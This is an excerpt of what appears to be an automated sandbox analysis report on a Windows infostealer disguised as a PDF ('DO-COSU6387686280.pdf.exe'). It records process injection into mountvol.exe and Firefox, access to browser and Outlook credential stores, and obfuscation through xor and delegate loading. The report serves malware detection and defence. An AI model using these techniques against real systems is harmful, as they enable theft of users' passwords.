                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01763FD53_2_01763FD5
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01763FD23_2_01763FD2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A1F923_2_017A1F92
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A9EB03_2_017A9EB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004188E33_2_004188E3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041006A3_2_0041006A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004100733_2_00410073
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040E2733_2_0040E273
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004102933_2_00410293
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040E3C33_2_0040E3C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040E3B73_2_0040E3B7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004027103_2_00402710
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00416A6B3_2_00416A6B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00416AE33_2_00416AE3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004030303_2_00403030
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0042F0833_2_0042F083
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AA3526_2_031AA352
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B03E66_2_031B03E6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FE3F06_2_030FE3F0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031902746_2_03190274
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031702C06_2_031702C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318A1186_2_0318A118
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E01006_2_030E0100
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031781586_2_03178158
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B01AA6_2_031B01AA
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A41A26_2_031A41A2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A81CC6_2_031A81CC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031820006_2_03182000
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031147506_2_03114750
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F07706_2_030F0770
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030EC7C06_2_030EC7C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310C6E06_2_0310C6E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F05356_2_030F0535
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B05916_2_031B0591
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031944206_2_03194420
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A24466_2_031A2446
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0319E4F66_2_0319E4F6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AAB406_2_031AAB40
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A6BD76_2_031A6BD7
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030EEA806_2_030EEA80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031069626_2_03106962
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F29A06_2_030F29A0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031BA9A66_2_031BA9A6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F28406_2_030F2840
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FA8406_2_030FA840
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030D68B86_2_030D68B8
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0311E8F06_2_0311E8F0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03110F306_2_03110F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03192F306_2_03192F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03132F286_2_03132F28
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03164F406_2_03164F40
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0316EFA06_2_0316EFA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E2FC86_2_030E2FC8
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FCFE06_2_030FCFE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AEE266_2_031AEE26
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F0E596_2_030F0E59
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03102E906_2_03102E90
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031ACE936_2_031ACE93
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AEEDB6_2_031AEEDB
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318CD1F6_2_0318CD1F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FAD006_2_030FAD00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03108DBF6_2_03108DBF
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030EADE06_2_030EADE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F0C006_2_030F0C00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03190CB56_2_03190CB5
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E0CF26_2_030E0CF2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A132D6_2_031A132D
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030DD34C6_2_030DD34C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0313739A6_2_0313739A
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F52A06_2_030F52A0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310B2C06_2_0310B2C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031912ED6_2_031912ED
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031BB16B6_2_031BB16B
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0312516C6_2_0312516C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030DF1726_2_030DF172
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030FB1B06_2_030FB1B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F70C06_2_030F70C0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0319F0CC6_2_0319F0CC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A70E96_2_031A70E9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AF0E06_2_031AF0E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AF7B06_2_031AF7B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031356306_2_03135630
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A16CC6_2_031A16CC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A75716_2_031A7571
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318D5B06_2_0318D5B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031B95C36_2_031B95C3
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AF43F6_2_031AF43F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E14606_2_030E1460
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFB766_2_031AFB76
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310FB806_2_0310FB80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03165BF06_2_03165BF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0312DBF96_2_0312DBF9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFA496_2_031AFA49
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A7A466_2_031A7A46
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03163A6C6_2_03163A6C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03135AA06_2_03135AA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0318DAAC6_2_0318DAAC
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03191AA36_2_03191AA3
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0319DAC66_2_0319DAC6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031859106_2_03185910
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310B9506_2_0310B950
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F99506_2_030F9950
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0315D8006_2_0315D800
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F38E06_2_030F38E0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFF096_2_031AFF09
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F1F926_2_030F1F92
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFFB16_2_031AFFB1
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B3FD26_2_030B3FD2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B3FD56_2_030B3FD5
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F9EB06_2_030F9EB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A1D5A6_2_031A1D5A
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030F3D406_2_030F3D40
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031A7D736_2_031A7D73
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_0310FDC06_2_0310FDC0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03169C326_2_03169C32
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_031AFCF26_2_031AFCF2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A31F306_2_02A31F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2AFA06_2_02A2AFA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2CFC06_2_02A2CFC0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2CDA06_2_02A2CDA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2CD976_2_02A2CD97
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2B0E46_2_02A2B0E4
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A2B0F06_2_02A2B0F0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A356106_2_02A35610
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A337986_2_02A33798
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A338106_2_02A33810
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A4BDB06_2_02A4BDB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE30C6_2_034BE30C
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE3346_2_034BE334
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE7EE6_2_034BE7EE
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BE4536_2_034BE453
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BD8B86_2_034BD8B8
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 0315EA12 appears 86 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 03137E54 appears 111 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 03125130 appears 58 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 0316F290 appears 105 times
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: String function: 030DB970 appears 280 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 017E7E54 appears 111 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 017D5130 appears 58 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 0180EA12 appears 86 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 0178B970 appears 280 times
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: String function: 0181F290 appears 105 times
                    Source: DO-COSU6387686280.pdf.exe, 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000000.00000002.1445394826.000000000733A000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000000.00000002.1429887077.000000000102E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMOUNTVOL.EXEj% vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe; Binary or memory string: OriginalFilenameKbmA.exeF vs DO-COSU6387686280.pdf.exe
                    Source: DO-COSU6387686280.pdf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: DO-COSU6387686280.pdf.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, id.cs; Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, id.cs; Cryptographic APIs: 'CreateDecryptor'
                    Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/13
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DO-COSU6387686280.pdf.exe.log
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Mutant created: NULL
                    Source: C:\Windows\SysWOW64\mountvol.exe; File created: C:\Users\user\AppData\Local\Temp\p1h163LmP
                    Source: DO-COSU6387686280.pdf.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Program Files\Mozilla Firefox\firefox.exe; File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1956819996.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3902989488.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3902989488.0000000002C08000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: DO-COSU6387686280.pdf.exe; ReversingLabs: Detection: 39%
                    Source: unknown; Process created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Process created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Process created: C:\Windows\SysWOW64\mountvol.exe "C:\Windows\SysWOW64\mountvol.exe"
                    Source: C:\Windows\SysWOW64\mountvol.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: version.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe; Section loaded: windowscodecs.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: ieframe.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: mlang.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: winsqlite3.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: vaultcli.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\mountvol.exe; Section loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Section loaded: mswsock.dll
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Section loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Section loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe; Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mountvol.pdb source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnLuReulIds.exe, 00000005.00000002.3902761074.000000000073E000.00000002.00000001.01000000.0000000C.sdmp, EnLuReulIds.exe, 00000007.00000002.3902762226.000000000073E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: mountvol.pdbGCTL source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: DO-COSU6387686280.pdf.exe, DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: DO-COSU6387686280.pdf.exe, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 6.2.mountvol.exe.383cd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 7.2.EnLuReulIds.exe.2c5cd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 7.0.EnLuReulIds.exe.2c5cd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 11.2.firefox.exe.1befcd14.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0176225F pushad ; ret 3_2_017627F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017627FA pushad ; ret 3_2_017627F9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017909AD push ecx; mov dword ptr [esp], ecx3_2_017909B6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0176283D push eax; iretd 3_2_01762858
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00414625 push ebp; ret 3_2_00414628
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041A970 push ds; ret 3_2_0041AA12
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041A91A push ds; ret 3_2_0041AA12
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041A9BD push ds; ret 3_2_0041AA12
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0041ABB6 push esi; iretd 3_2_0041ABB7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_004032D0 push eax; ret 3_2_004032D2
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0040149C pushfd ; retf 3_2_0040149D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_00401DDD push edx; retf 3_2_00401DE3
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B225F pushad ; ret 6_2_030B27F9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B27FA pushad ; ret 6_2_030B27F9
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030E09AD push ecx; mov dword ptr [esp], ecx6_2_030E09B6
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B283D push eax; iretd 6_2_030B2858
